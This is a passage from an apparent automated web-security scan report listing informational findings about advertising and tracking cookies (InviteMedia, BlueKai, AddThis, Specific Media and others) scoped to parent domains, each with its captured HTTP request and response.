User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=82d726c3-44ee-407c-85c4-39a0b0fc11ef; exchange_uid="eyI0IjpbIkNBRVNFSk81T0hYNWxOR0lITDdmRUVFSjQtWSIsNzM0MTUxXX0="; io_frequency="{\"8733\": [0+ 0+ 1295634039+ 1+ 1295634039+ 1]}"; impressions="{\"429622\": [1295634039+ \"94ea05fe-2d4a-3bf7-a98e-3964b49408cd\"+ 83803+ 56236+ 46]}"; frequency="{\"429622\": [1295893239+ 1+ 1295634039+ 1+ 1295634039+ 1]}"; subID="{}"; dp_rec="{\"2\": 1295634039}"; segments="30767|11262|16681|11265|17329|18086|17277|38582,1298044270|10102"

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Mon, 24 Jan 2011 21:07:11 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Mon, 24-Jan-2011 21:06:51 GMT
Content-Type: text/javascript
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: segments="3391|3392|30767|11262|16681|11265|17329|18086|17277|38582,1298044270|10102"; Domain=invitemedia.com; expires=Tue, 24-Jan-2012 21:07:11 GMT; Path=/
Content-Length: 488

makePixelRequest("http://ad.doubleclick.net/activity;src=1946758;dcnet=4591;boom=30274;sz=1x1;ord=1","image");makePixelRequest("http://ad.doubleclick.net/activity;src=1946758;dcnet=4591;boom=30275;sz=
...[SNIP]...

13.152. http://segment-pixel.invitemedia.com/unpixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://segment-pixel.invitemedia.com
Path:	/unpixel

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

segments="3391|3392|30767|11262|11265|17329|18086|17277|38582,1298044270|10102"; Domain=invitemedia.com; expires=Tue, 24-Jan-2012 22:20:55 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /unpixel?pixelID=16681&partnerID=159&clientID=2781&key=segment HTTP/1.1
Host: segment-pixel.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://tweetmeme.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=82d726c3-44ee-407c-85c4-39a0b0fc11ef; exchange_uid="eyI0IjpbIkNBRVNFSk81T0hYNWxOR0lITDdmRUVFSjQtWSIsNzM0MTUxXX0="; io_frequency="{\"8733\": [0+ 0+ 1295634039+ 1+ 1295634039+ 1]}"; impressions="{\"429622\": [1295634039+ \"94ea05fe-2d4a-3bf7-a98e-3964b49408cd\"+ 83803+ 56236+ 46]}"; frequency="{\"429622\": [1295893239+ 1+ 1295634039+ 1+ 1295634039+ 1]}"; subID="{}"; dp_rec="{\"2\": 1295634039}"; segments="3391|3392|30767|11262|16681|11265|17329|18086|17277|38582,1298044270|10102"

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Mon, 24 Jan 2011 22:20:55 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Mon, 24-Jan-2011 22:20:35 GMT
Content-Type: image/gif
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: segments="3391|3392|30767|11262|11265|17329|18086|17277|38582,1298044270|10102"; Domain=invitemedia.com; expires=Tue, 24-Jan-2012 22:20:55 GMT; Path=/
Content-Length: 43

GIF89a.............!.......,...........D..;

13.153. http://shopping.tweetmeme.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://shopping.tweetmeme.com
Path:	/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

tm_identity=f1ebd483b2efcc03279de61bb3488d25; expires=Tue, 01-Feb-2011 13:16:01 GMT; path=/; domain=.tweetmeme.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: shopping.tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:16:01 GMT
Content-Type: text/html
Connection: close
Set-Cookie: tm_identity=f1ebd483b2efcc03279de61bb3488d25; expires=Tue, 01-Feb-2011 13:16:01 GMT; path=/; domain=.tweetmeme.com
X-Ads-Served-In: 0.0041639804840088
X-Served-In: 0.046626806259155
X-Served-By: h00
Content-Length: 42519

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<title
...[SNIP]...

13.154. http://smallbusinessnews.tweetmeme.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://smallbusinessnews.tweetmeme.com
Path:	/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

tm_identity=bd74cadd632dd88dd5215d3c753b762c; expires=Tue, 01-Feb-2011 13:16:10 GMT; path=/; domain=.tweetmeme.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: smallbusinessnews.tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:16:10 GMT
Content-Type: text/html
Connection: close
Set-Cookie: tm_identity=bd74cadd632dd88dd5215d3c753b762c; expires=Tue, 01-Feb-2011 13:16:10 GMT; path=/; domain=.tweetmeme.com
X-Ads-Served-In: 0.0054209232330322
X-Served-In: 0.042685031890869
X-Served-By: ded2060
Content-Length: 44487

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<title
...[SNIP]...

13.155. http://smp.specificmedia.com/smp/v=5 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://smp.specificmedia.com
Path:	/smp/v=5

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

smu=5046.928757113086138685; domain=.specificmedia.com; path=/; expires=Tue, 29-Dec-2015 21:06:42 GMT
smt=eJxjZWdmYGBgZGECksxcXIZGlqaWBsZGBkbIbI5GoCyLkamZBQBmCQWm; domain=.specificmedia.com; path=/; expires=Tue, 29-Dec-2015 21:06:42 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /smp/v=5;m=1;t=2568;ts=1295903195040 HTTP/1.1
Host: smp.specificmedia.com
Proxy-Connection: keep-alive
Referer: http://www.autobytel.com/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: smu=5051.928757113086138685

Response

HTTP/1.1 302 Found
Date: Mon, 24 Jan 2011 21:06:42 GMT
Server: Apache/2.2.15 (Unix) DAV/2 mod_perl/2.0.4 Perl/v5.10.0
Set-cookie: smu=5046.928757113086138685; domain=.specificmedia.com; path=/; expires=Tue, 29-Dec-2015 21:06:42 GMT
Set-cookie: smt=eJxjZWdmYGBgZGECksxcXIZGlqaWBsZGBkbIbI5GoCyLkamZBQBmCQWm; domain=.specificmedia.com; path=/; expires=Tue, 29-Dec-2015 21:06:42 GMT
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI NAV"
Location: http://cache.specificmedia.com/creative/blank.gif
Connection: close
Content-Type: text/html
Content-Length: 412

<head><title>Moved</title>
<body>This object has moved to <a href="http://cache.specificmedia.com/creative/blank.gif">http://cache.specificmedia.com/creative/blank.gif</a></body>
<!DOCTYPE HTML PUBLIC
...[SNIP]...

13.156. http://su.addthis.com/red/usync previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://su.addthis.com
Path:	/red/usync

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

di=%7B%222%22%3A%22914803576615380%2CrcHW800iZiMAAocf%22%7D..1295903322.60|1295452270.19F|1293848200.66; Domain=.addthis.com; Expires=Thu, 24-Jan-2013 01:35:49 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /red/usync?pid=2&puid=914803576615380,rcHW800iZiMAAocf HTTP/1.1
Host: su.addthis.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/B3DM/DLX/1@x71
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTAwMDAwVg%3d%3d; dt=X; di=%7B%7D..1295452270.19F|1295903322.60|1293848200.66; uid=4d1ec56b7612a62c; psc=4

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: di=%7B%222%22%3A%22914803576615380%2CrcHW800iZiMAAocf%22%7D..1295903322.60|1295452270.19F|1293848200.66; Domain=.addthis.com; Expires=Thu, 24-Jan-2013 01:35:49 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Content-Type: image/png
Content-Length: 67
Date: Tue, 25 Jan 2011 01:35:49 GMT
Connection: close

.PNG
.
...IHDR.............:~.U...
IDATx.c`......H..q....IEND.B`.

13.157. http://tacoda.at.atwola.com/rtx/r.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tacoda.at.atwola.com
Path:	/rtx/r.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ATTAC=a3ZzZWc9OTk5OTk6NTY3ODA6NjA3Mzk6NjA4NDg6NjI3MjI=; expires=Thu, 19-Jan-12 21:06:44 GMT; path=/; domain=.at.atwola.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:06:44 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Cache-Control: max-age=900
Expires: Mon, 24 Jan 2011 21:21:44 GMT
Set-Cookie: ANRTT=60848^1^1296494968|62722^1^1296508004; path=/; expires=Mon, 31-Jan-11 21:06:44 GMT; domain=tacoda.at.atwola.com
Set-Cookie: Tsid=0^1295903204^1295905004|17295^1295903204^1295905004; path=/; expires=Mon, 24-Jan-11 21:36:44 GMT; domain=tacoda.at.atwola.com
Set-Cookie: TData=99999|^|56780|60739|#|60848|62722; expires=Thu, 19-Jan-12 21:06:44 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: Anxd=x; expires=Tue, 25-Jan-11 03:06:44 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: N=2:71e5fe306b3f97af479b09e96a0ca00a,3c9757ed1e17089910d4221c9c7e35f4; expires=Thu, 19-Jan-12 21:06:44 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: ATTAC=a3ZzZWc9OTk5OTk6NTY3ODA6NjA3Mzk6NjA4NDg6NjI3MjI=; expires=Thu, 19-Jan-12 21:06:44 GMT; path=/; domain=.at.atwola.com
Cteonnt-Length: 128
Content-Type: application/x-javascript
Content-Length: 128

var ANUT=1;
var ANOO=0;
var ANSR=1;
var ANTID='16if17a0kq0bgd';
var ANSL='99999|^|56780|60739|#|60848|62722';
ANRTXR();

13.158. http://tags.bluekai.com/site/10 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tags.bluekai.com
Path:	/site/10

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

bk=Sbr2orXnuT6sHNJo; expires=Sat, 23-Jul-2011 21:06:44 GMT; path=/; domain=.bluekai.com
bkc=KJpMRZOQ0s5CRcM06+SUWzMZ9rJ1BcT1skIx9zawRtPQrOgmyceoMiVznXsn0Q4oCda8KHQRdQAy1C0oBT4pFfmCXAc3R4yxeQRsgPysC+ybOaXeMx2ueImcx5lgeIVF8Gny4y+gIM/pBBiYIBS+3wpBZhcXK3CfY8QCIAcXKeEIMyQWw8/jG7TlApkxwhmRl00n0k2QM1o4i1SwDZmWXp29l4rxYV/IiOd9Mzo7dGgvfta7Cww8rucbq0whFRhHIzIIG4vaoH7CdWHsiw8dryhXZSeXK56/wQ1FHe8PUyrLcLHlfWEkUNPCHmcFPDwkub3MX365DwAKScpjO9udChNidN5Q41cT27sG49z6FZy+Q7X/sgfvSDoyFC6lvod7W/nwYKxfB3e0D8oHI4rZ/dQ95omeay==; expires=Sat, 23-Jul-2011 21:06:44 GMT; path=/; domain=.bluekai.com
bko=KJ0qh1q9XmukguXqQpzFC1U//1zcR26Oi7N71QK0J/ai34oSxOR9PgTnh9==; expires=Sat, 23-Jul-2011 21:06:44 GMT; path=/; domain=.bluekai.com
bkst=KJhMREMWhzYQyZOARjaGRVjioZrjRZiQS8JA73uqjJ0uooruSsaiqshLqZZjj3bzorEny79O3Jb5GExFm0Idw1IctHyG29WGJ1hQRZOiRZHZRVOARZoCSskrjZhAXj9JJ1lwpx9W+XaLUtTAlqFOxitRxArHCjbX+9DvX4v9fE9l1pYhBnv6+ex0BnRy1exlBM8uqITn9YsAnPA=; expires=Sat, 23-Jul-2011 21:06:44 GMT; path=/; domain=.bluekai.com
bkw4=KJpfoXU9y1M90zU9LsXb9T1wLfZFggw1b65ZDFRyIQQM9y1f9f1C9XmeKTPo2fuHNK2Zy3bKkVWmDctEkRFSakNiNn1hUeBiRBMXGAMpaac3tH7I9+V4YpCxhSbwgwfJuNrLbgAjcW6RsvELmqx2eBcBdfw0T0U4o9Hfs9NupXHyt8uO/zgeittavDQ2DeZe/9wW4e4PD3jjcB7tNF42Kb47a5Zc1RaDVaA01OpXWzioSxcueEn4LRWOEvz61pOXhtnwn39IjGjuSySsaE4Uz4aRQDhCTsPQAWNQjWMPNTv3eTYgkyqq9yJOOLhm3tpHl4VgnZ+w0Kx1Khi2Q97AAi5te9yhFpkp9qpZCTX=; expires=Sat, 23-Jul-2011 21:06:44 GMT; path=/; domain=.bluekai.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site/10?ret=html&phint=pageName%3Dunknown&phint=pageRequestID%3D427D360F-AD19-8945-2CEDA65620083A33&phint=affiliateGroupName%3DSearch%20Engine%20Optimization%20Project&phint=affiliateName%3DSEO%20DTS%20-%20Google%20ABTL%2013148&phint=campaign%3D13148&phint=__bk_t%3DBuy%20your%20next%20new%20or%20used%20car%20online%20with%20our%20New%20Car%20Pricing%20Guides%2C%20Car%20Reviews%2C%20Vehicle%20Comparisons%20and%20Used%20Car%20Inventory%20services.%20%7C%20Autobytel.com&phint=__bk_k%3DPricing%2CGuide%2Cbuy%20a%20new%20car%2Cbuy%20a%20used%20auto%2Cnew%20auto%2Cused%20auto%2Cnew%20car%2Cused%20car%2Cnew%20car%20pricing%2Cused%20car%20pricing%2Cdealer%2Clocal%20dealer%2C%20new%20car%20inventory%2C%20used%20car%20inventory&limit=10&r=42794077 HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
Referer: http://www.autobytel.com/x22
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bku=yQG99YBZ/AlFQiDm; bko=KJ0fyXF9XJlJlJKHRH/q9T1wLfAFvT1AcyBe3gTVD9y9Uh9aYy==; bkw4=KJpfoXU9y1M90zU9LsXb9T1wLfZFggw1b65ZDFRyIQQM9y1f9f1C9XmeKTPo2fuHNK2Zy3bKkVWmDctEkRFSakNiNn1hUeBiRBMXGAMpaac3tH7I9+V4YpCx8Vs/gFfw0GIU4J1ufsW6ue6EytNEOGRGe0XtExLxebEKLRWOEvz61pOXhbJFah1e9pBe3EDeyT3qbfCTgWet1w9011QZ1evAbZ+ONx49NDLpQPD9xj9OLh19DDoQSQ==; bkst=KJhMREMWhzYQyZOARjaGRVjioZrjRZiQS8JA73uqjJ0uooruSsaiqshLqZZjj3bzorEny79O3Jb5GExFm0Idw1IctHyG29WGJ1hQRZOiRZHZRVOARZoCSskrjZhAXj9JJ1lwpx9W+XaLUtTAlqFOxitRxgyXR9wBpxh1n/6LnutBe/6+e9pBMRtwNJFf9QY26izl; bk=dOTA6tBCxZ/sHNJo; bkc=KJhnRtPQrOgmyceoM3DF/y1exh3xnXsn0G2Cx4O8KHQRdQAy1C0oBT4pFfmCXAc3R4yxeQRsgPysC+ybOaXeMx2ueImc1DeTdkeISiT/dfKyoiXpxT1+isd5iLg4FO7OgTKb+T9jGCdWM64MdTC9XYmj/Kol18Ae2EmOIzt03wyah3MXCVMXvePsmwXeNn6wZueZQdQOlvCX83IGdO8tHMi47hridpRulXLRk4dLs0o4VJGHpA2ACmMd+XF9ky7v72KBTewyxrHE2qU9bAaXh68DdkDPHCEIUMPDF3xbv+dS9jUFQzSUEDeyK2QC27XahCK1qhIc0759TXFV/FicGmsg7vRW82+hGdJ8eicT7WYIRy13wbDjkq2FmG/w9BZIKeT=

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 21:06:44 GMT
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Set-Cookie: bk=Sbr2orXnuT6sHNJo; expires=Sat, 23-Jul-2011 21:06:44 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=KJpMRZOQ0s5CRcM06+SUWzMZ9rJ1BcT1skIx9zawRtPQrOgmyceoMiVznXsn0Q4oCda8KHQRdQAy1C0oBT4pFfmCXAc3R4yxeQRsgPysC+ybOaXeMx2ueImcx5lgeIVF8Gny4y+gIM/pBBiYIBS+3wpBZhcXK3CfY8QCIAcXKeEIMyQWw8/jG7TlApkxwhmRl00n0k2QM1o4i1SwDZmWXp29l4rxYV/IiOd9Mzo7dGgvfta7Cww8rucbq0whFRhHIzIIG4vaoH7CdWHsiw8dryhXZSeXK56/wQ1FHe8PUyrLcLHlfWEkUNPCHmcFPDwkub3MX365DwAKScpjO9udChNidN5Q41cT27sG49z6FZy+Q7X/sgfvSDoyFC6lvod7W/nwYKxfB3e0D8oHI4rZ/dQ95omeay==; expires=Sat, 23-Jul-2011 21:06:44 GMT; path=/; domain=.bluekai.com
Set-Cookie: bko=KJ0qh1q9XmukguXqQpzFC1U//1zcR26Oi7N71QK0J/ai34oSxOR9PgTnh9==; expires=Sat, 23-Jul-2011 21:06:44 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkst=KJhMREMWhzYQyZOARjaGRVjioZrjRZiQS8JA73uqjJ0uooruSsaiqshLqZZjj3bzorEny79O3Jb5GExFm0Idw1IctHyG29WGJ1hQRZOiRZHZRVOARZoCSskrjZhAXj9JJ1lwpx9W+XaLUtTAlqFOxitRxArHCjbX+9DvX4v9fE9l1pYhBnv6+ex0BnRy1exlBM8uqITn9YsAnPA=; expires=Sat, 23-Jul-2011 21:06:44 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkw4=KJpfoXU9y1M90zU9LsXb9T1wLfZFggw1b65ZDFRyIQQM9y1f9f1C9XmeKTPo2fuHNK2Zy3bKkVWmDctEkRFSakNiNn1hUeBiRBMXGAMpaac3tH7I9+V4YpCxhSbwgwfJuNrLbgAjcW6RsvELmqx2eBcBdfw0T0U4o9Hfs9NupXHyt8uO/zgeittavDQ2DeZe/9wW4e4PD3jjcB7tNF42Kb47a5Zc1RaDVaA01OpXWzioSxcueEn4LRWOEvz61pOXhtnwn39IjGjuSySsaE4Uz4aRQDhCTsPQAWNQjWMPNTv3eTYgkyqq9yJOOLhm3tpHl4VgnZ+w0Kx1Khi2Q97AAi5te9yhFpkp9qpZCTX=; expires=Sat, 23-Jul-2011 21:06:44 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=res; expires=Tue, 25-Jan-2011 21:06:44 GMT; path=/; domain=.bluekai.com
BK-Server: d08b
Content-Length: 430
Content-Type: text/html
Connection: keep-alive

<html>
<head>
</head>
<body>
<div id="bk_exchange">
<img src="http://cm.g.doubleclick.net/pixel?nid=bluekai&" width=1 height=1 border=0 alt="">
<img src="http://osmdcs.interclick.com/pixel.aspx?dp=9EB
...[SNIP]...

13.159. http://tags.bluekai.com/site/2981 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tags.bluekai.com
Path:	/site/2981

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

bk=QbmOT/N77lGsHNJo; expires=Sat, 23-Jul-2011 21:07:11 GMT; path=/; domain=.bluekai.com
bkc=KJh56q2nQAWROde7lg4u4clJzY7iUu3LU9Gzp1EunRvUs3J4ueIQC9Sh4X9DoWa0qTLS7Og5iC3AF0Oy3iV/GvlaYQngpgFlprKsspfz2lFlzaKl9OqXOwTIDiTOQegNFmjLc6QcbYoxFdUTVcBVXp9G8dGOVoL9E0XJbHWqZdD2t6s9EGM9R0ArdEt9p4vKNd696Eh9dkH8VMwnK2TxXbTvlyuT4X1pgQ7kacw0enFHDYbJKD21lZ4K6d0poqh+XF05WS52GIrvQl6PyffVFO1C6o2ilkKe7XIXjZsqqK0SM6Qwi422fFavewF2YpLXH3xwYm2lqr5zxdM0UOkLF7X6sIlZZEBPfBRAxqbwR/2mRu4Et1rS7UlkZGd4lbqd8Ukoapr+tuA3BXUfErEsoHz+fsOEKj9bDXRIgs9dUYMd98GNMVx=; expires=Sat, 23-Jul-2011 21:07:11 GMT; path=/; domain=.bluekai.com
bko=KJhE8VPQIwduNoKHRH/q9X1E//rByjLUyZJAAmmeLKT9hqTpZxBjAAYhPc6+/9L9bD6mSx==; expires=Sat, 23-Jul-2011 21:07:11 GMT; path=/; domain=.bluekai.com
bkst=KJhMREMWhzYQyZOARjaGRVjioZrjRZiQS8JA73uqjJ0uooruSsaiqshLqZZjj3bzorEny79O3Jb5GExFm0Idw1IctHyG29WGJ1hQRZOiRZHZRVOARZoCSskrjZhAXj9JJ1lwpx9W+XaLUtTAlqFOxitRxArOx+/1pGbrySbrTqfIOPfK8rfh/KP8DjPa8jbbHzWZdNdS9oUhXGe+BEzp1nW6Lgu6Be/6+M9yBeztwkJFfQL9Y79pPy==; expires=Sat, 23-Jul-2011 21:07:11 GMT; path=/; domain=.bluekai.com
bkw4=KJpfoXU9y1M90zU9LsXb9T1wLfZFggw1b65ZDFRyIQQM9y1f9f1C9XmeKTPo2fuHNK2Zy3bKkVWmDctEkRFSakNiNn1hUeBiRBMXGAMpaac3tH7I9+V4YpCxhSbwgwfJuNrLbgAjcW6RsvELmqx2eBcBdfw0T0U4o9Hfs9NupXHyt8uO/zgeittavDQ2DeZe/9wW4e4PD3jjcB7tNF42Kb47a5Zc1RaDVaA01OpXWzC8sAU24bebUlPjK6GZj2Mebc0QKZRsn3ebJ4m2zpx+xnSOlmwRy9YZD8Gjsn8Mz5zrLn8uSySsaE4Uz4aRQKhCTsPQAWNQjWMPNTv3eTYgkySfYyuYeJi5P+ZiIyw5UxrRxY88RL49Wwmq1hz9d63VjQ==; expires=Sat, 23-Jul-2011 21:07:11 GMT; path=/; domain=.bluekai.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site/2981?id=CAESEEWMOpJK7G_TwnZyrwI-rS4&cver=1& HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
Referer: http://tags.bluekai.com/site/10?ret=html&phint=pageName%3Dunknown&phint=pageRequestID%3D427D360F-AD19-8945-2CEDA65620083A33&phint=affiliateGroupName%3DSearch%20Engine%20Optimization%20Project&phint=affiliateName%3DSEO%20DTS%20-%20Google%20ABTL%2013148&phint=campaign%3D13148&phint=__bk_t%3DBuy%20your%20next%20new%20or%20used%20car%20online%20with%20our%20New%20Car%20Pricing%20Guides%2C%20Car%20Reviews%2C%20Vehicle%20Comparisons%20and%20Used%20Car%20Inventory%20services.%20%7C%20Autobytel.com&phint=__bk_k%3DPricing%2CGuide%2Cbuy%20a%20new%20car%2Cbuy%20a%20used%20auto%2Cnew%20auto%2Cused%20auto%2Cnew%20car%2Cused%20car%2Cnew%20car%20pricing%2Cused%20car%20pricing%2Cdealer%2Clocal%20dealer%2C%20new%20car%20inventory%2C%20used%20car%20inventory&limit=10&r=42794077
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bku=yQG99YBZ/AlFQiDm; bk=Sbr2orXnuT6sHNJo; bkc=KJpMRZOQ0s5CRcM06+SUWzMZ9rJ1BcT1skIx9zawRtPQrOgmyceoMiVznXsn0Q4oCda8KHQRdQAy1C0oBT4pFfmCXAc3R4yxeQRsgPysC+ybOaXeMx2ueImcx5lgeIVF8Gny4y+gIM/pBBiYIBS+3wpBZhcXK3CfY8QCIAcXKeEIMyQWw8/jG7TlApkxwhmRl00n0k2QM1o4i1SwDZmWXp29l4rxYV/IiOd9Mzo7dGgvfta7Cww8rucbq0whFRhHIzIIG4vaoH7CdWHsiw8dryhXZSeXK56/wQ1FHe8PUyrLcLHlfWEkUNPCHmcFPDwkub3MX365DwAKScpjO9udChNidN5Q41cT27sG49z6FZy+Q7X/sgfvSDoyFC6lvod7W/nwYKxfB3e0D8oHI4rZ/dQ95omeay==; bko=KJ0qh1q9XmukguXqQpzFC1U//1zcR26Oi7N71QK0J/ai34oSxOR9PgTnh9==; bkst=KJhMREMWhzYQyZOARjaGRVjioZrjRZiQS8JA73uqjJ0uooruSsaiqshLqZZjj3bzorEny79O3Jb5GExFm0Idw1IctHyG29WGJ1hQRZOiRZHZRVOARZoCSskrjZhAXj9JJ1lwpx9W+XaLUtTAlqFOxitRxArHCjbX+9DvX4v9fE9l1pYhBnv6+ex0BnRy1exlBM8uqITn9YsAnPA=; bkw4=KJpfoXU9y1M90zU9LsXb9T1wLfZFggw1b65ZDFRyIQQM9y1f9f1C9XmeKTPo2fuHNK2Zy3bKkVWmDctEkRFSakNiNn1hUeBiRBMXGAMpaac3tH7I9+V4YpCxhSbwgwfJuNrLbgAjcW6RsvELmqx2eBcBdfw0T0U4o9Hfs9NupXHyt8uO/zgeittavDQ2DeZe/9wW4e4PD3jjcB7tNF42Kb47a5Zc1RaDVaA01OpXWzioSxcueEn4LRWOEvz61pOXhtnwn39IjGjuSySsaE4Uz4aRQDhCTsPQAWNQjWMPNTv3eTYgkyqq9yJOOLhm3tpHl4VgnZ+w0Kx1Khi2Q97AAi5te9yhFpkp9qpZCTX=; bkdc=res

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 21:07:11 GMT
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Set-Cookie: bk=QbmOT/N77lGsHNJo; expires=Sat, 23-Jul-2011 21:07:11 GMT; path=/; domain=.bluekai.com
